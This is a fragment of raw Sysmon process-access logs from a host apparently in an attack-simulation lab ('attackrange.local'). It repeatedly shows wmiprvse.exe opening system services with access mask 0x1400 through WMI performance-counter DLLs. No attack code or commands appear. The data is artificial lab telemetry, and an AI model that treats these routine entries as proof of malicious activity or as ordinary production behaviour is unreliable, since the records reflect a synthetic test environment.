TEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150502Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150501Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150500Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150499Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150498Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150497Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150496Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150495Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150494Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150493Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150492Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150491Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150490Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150489Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150488Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150487Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f